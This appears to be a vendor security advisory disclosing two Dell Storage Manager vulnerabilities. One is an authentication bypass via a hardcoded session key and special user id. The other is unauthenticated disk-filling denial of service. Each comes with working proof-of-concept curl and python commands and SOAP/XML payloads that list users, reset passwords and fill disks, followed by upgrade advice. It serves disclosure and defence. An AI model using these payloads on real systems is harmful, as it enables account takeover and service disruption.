Synopsis
CVE-2025-43995: Authentication Bypass in DSM Data Collector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId.
It's been observed that the ApiSession identified by an integer key of 1 seems to be present in the "sessionHash" regardless of whether any user is currently or was previously logged into the Web GUI of the application.
Additionally, it appears that there are some special users used in the application. These are masterUser (id 434223), rmsUser (id 434224), and smisUser (id 434225).
By specifying a <SessionKey>1</SessionKey> and <UserId>434223</UserId> in a SOAP message sent to endpoint /CompellentApiServices/CompellentAPIServices, the attacker can access (without authentication) a large set of APIs, including changing an existing DSM user's password.
Proof of Concept
# Get existing users
# - user id identified by InstanceId and user name by InstanceName
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="<http://schemas.xmlsoap.org/soap/envelope/>" xmlns:web="<http://WebServer.WebServices.compellent.com/>"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>GetList</Command><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' '<https://<target-host>>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Instance(Id|Name)>.*?/Instance(Id|Name)>'
InstanceId>434226</InstanceId>
InstanceName>dsmuser</InstanceName>
# Change password for the user identified by the InstanceId 434226 to "Password123" (without quotes)
# - Modify <InstanceId> and <NewPassword> as needed
# - NOTE:
# --- NewPassword cannot be the same as the old one
# --- NewPassword may need to meet the password min/max length and/or complexity rules
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>ChangePassword</Command><Attributes><InstanceId>434226</InstanceId><NewPassword>Password123</NewPassword></Attributes><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Successful>.*/Successful>'
Successful>True</Successful>
CVE-2025-43994: Unauthenticated Large Directory Creation in DSM Server Agent (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
The DSM Server Agent allows an unauthenticated remote attacker to create a directory tree structure with the size specified by the attacker on the host running the agent. This could allow the attacker to fill up a disk drive, potentially leading to DoS.
Proof of Concept
python3 dsm_server_agent_create_space.py -t <target-host> -p 27355 -s 1000
Creating a directory tree of 1000 MB in C:\ on the remote host
Sending:
<em_sa_xml><Command>Create</Command><Arguments><DriveOrMountPoint>C:\</DriveOrMountPoint><FreePercent>0</FreePercent><SizeMB>1000</SizeMB></Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>
Received:
<em_sa_xml>
<BaseProcess>
<Index>638868988165592124</Index>
<ProcessName>[Process638868988165592124]CreateSpaceProcess</ProcessName>
<CurrentProgress>0</CurrentProgress>
<TotalProgress>10</TotalProgress>
<CurrentProgress2>0</CurrentProgress2>
<TotalProgress2>0</TotalProgress2>
<State>1</State>
<StateStr>NotStarted</StateStr>
<Message></Message>
<MessageId></MessageId>
<Message2Id></Message2Id>
<MessageParams></MessageParams>
<Message2Params></Message2Params>
</BaseProcess>
</em_sa_xml>
Solution
Upgrade to version 2020 R1.22 or later.
Additional References
https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilitiesDisclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team